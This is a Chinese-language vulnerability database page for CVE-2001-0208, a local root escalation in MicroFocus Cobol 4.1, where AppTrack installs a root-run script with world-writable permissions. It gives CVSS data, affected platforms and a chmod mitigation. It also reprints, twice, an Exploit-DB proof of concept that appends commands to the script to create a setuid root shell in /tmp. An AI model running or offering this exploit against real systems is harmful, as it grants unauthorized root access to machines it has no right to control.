CVE-2001-0208
CVSS4.6
发布时间 :2001-06-02 00:00:00
修订时间 :2008-09-05 16:23:32
NMCOES    

[原文]MicroFocus Cobol 4.1, with the AppTrack feature enabled, installs the mfaslmf directory and the nolicense file with insecure permissions, which allows local users to gain privileges by modifying files.


[CNNVD]Micro Focus Cobol本地任意命令执行漏洞(CNNVD-200106-017)

        
        Micro Focus Cobol是一款由Merant开发的Unix平台下的开发套件。
        当Micro Focus Cobol的'Apptrack'功能使用的时候某个脚本以不安全文件权限安装,本地攻击者可以利用这个漏洞提升权限。
        如果Micro Focus Cobol的'Apptrack'功能开启的情况下,/var/mfaslmf以777模式安装,/var/mfaslmf/nolicense以666模式安装,nolicense包含如下脚本:
        # Append into a logfile
        if test ! -f /var/mfaslmf/USERLOG
        then
         touch /var/mfaslmf/USERLOG
         chmod 666 /var/mfaslmf/USERLOG
        fi
        echo `date`:No license $* >> /var/mfaslmf/USERLOG
        #mail a specified user (commented out by default. substitute the user
        name)
        echo `date`:No license $* > /var/mfaslmf/tmpmess
        # mail -s "No AS license" user-name < /var/mfaslmf/tmpmess
        rm /var/mfaslmf/tmpmess
        由于权限问题,并且此脚本启动的时候以root用户权限执行,非特权用户可以编辑脚本并插入任意恶意命令,当程序执行的时可以导致插入的恶意命令以root用户权限执行。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0208
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0208
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-017
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2359
(VENDOR_ADVISORY)  BID  2359
http://archives.neohapsis.com/archives/bugtraq/2001-02/0205.html
(VENDOR_ADVISORY)  BUGTRAQ  20010211 Security Hole in Microfocus Cobol

- 漏洞信息

Micro Focus Cobol本地任意命令执行漏洞
中危 配置错误
2001-06-02 00:00:00 2005-10-20 00:00:00
本地  
        
        Micro Focus Cobol是一款由Merant开发的Unix平台下的开发套件。
        当Micro Focus Cobol的'Apptrack'功能使用的时候某个脚本以不安全文件权限安装,本地攻击者可以利用这个漏洞提升权限。
        如果Micro Focus Cobol的'Apptrack'功能开启的情况下,/var/mfaslmf以777模式安装,/var/mfaslmf/nolicense以666模式安装,nolicense包含如下脚本:
        # Append into a logfile
        if test ! -f /var/mfaslmf/USERLOG
        then
         touch /var/mfaslmf/USERLOG
         chmod 666 /var/mfaslmf/USERLOG
        fi
        echo `date`:No license $* >> /var/mfaslmf/USERLOG
        #mail a specified user (commented out by default. substitute the user
        name)
        echo `date`:No license $* > /var/mfaslmf/tmpmess
        # mail -s "No AS license" user-name < /var/mfaslmf/tmpmess
        rm /var/mfaslmf/tmpmess
        由于权限问题,并且此脚本启动的时候以root用户权限执行,非特权用户可以编辑脚本并插入任意恶意命令,当程序执行的时可以导致插入的恶意命令以root用户权限执行。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * $ chmod 644 /var/mfaslmf/nolicense
        * $ chmod 755 /var/mfaslmf
        厂商补丁:
        Merant
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Micro Focus Upgrade Cobol 4.2
        
        http://supportline.microfocus.com/

- 漏洞信息 (20621)

Micro Focus Cobol 4.1 Arbitrary Command Execution Vulnerability (EDBID:20621)
unix local
2001-02-12 Verified
0 Dixie Flatline
N/A [点击下载]
source: http://www.securityfocus.com/bid/2359/info

Micro Focus Cobol is a development suite for unix platforms offered by Merant. It is typically licensed on a per-user basis.

If Micro Focus Cobol is installed with the 'Apptrack' feature enabled, local users may be able to elevate privileges. A shell script called 'nolicense' that is executed as root is installed with insecure file permissions.

As a result, attackers may be able to execute arbitrary commands as root if the script is modified.

This is known to affect version 4.1. Though unverified, previous versions of Micro Focus Cobol may also be vulnerable. 

$ cat >> /var/mfaslmf/nolicense
/bin/cp /bin/ksh /tmp; chmod 4755 /tmp/ksh
^D

[wait until the application server licenses are used up]

$ /tmp/ksh
# 		

- 漏洞信息

13805
MicroFocus Cobol with AppTrack Feature mfaslmf Permission Weakness Privilege Escalation
Local Access Required Misconfiguration
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-02-11 Unknow
2001-02-12 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Micro Focus Cobol Arbitrary Command Execution Vulnerability
Configuration Error 2359
No Yes
2001-02-12 12:00:00 2009-07-11 04:46:00
First posted to Bugtraq by Dixie Flatline <echo8@firest0rm.org> on Feb 12, 2001.

- 受影响的程序版本

Micro Focus Cobol 4.1
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 f
- HP HP-UX 11.0
- HP HP-UX 10.20
- IBM AIX 4.2
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SCO Open Server 5.0.5
- SCO Unixware 7.1
- Sun Solaris 2.5.1
- Sun Solaris 7.0
- Sun Solaris 2.6_sparc
Micro Focus Cobol 4.2

- 不受影响的程序版本

Micro Focus Cobol 4.2

- 漏洞讨论

Micro Focus Cobol is a development suite for unix platforms offered by Merant. It is typically licensed on a per-user basis.

If Micro Focus Cobol is installed with the 'Apptrack' feature enabled, local users may be able to elevate privileges. A shell script called 'nolicense' that is executed as root is installed with insecure file permissions.

As a result, attackers may be able to execute arbitrary commands as root if the script is modified.

This is known to affect version 4.1. Though unverified, previous versions of Micro Focus Cobol may also be vulnerable.

- 漏洞利用

$ cat &gt;&gt; /var/mfaslmf/nolicense
/bin/cp /bin/ksh /tmp; chmod 4755 /tmp/ksh
^D

[wait until the application server licenses are used up]

$ /tmp/ksh
#

- 解决方案

The vendor has released a fix for this issue in version 4.2.


Micro Focus Cobol 4.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站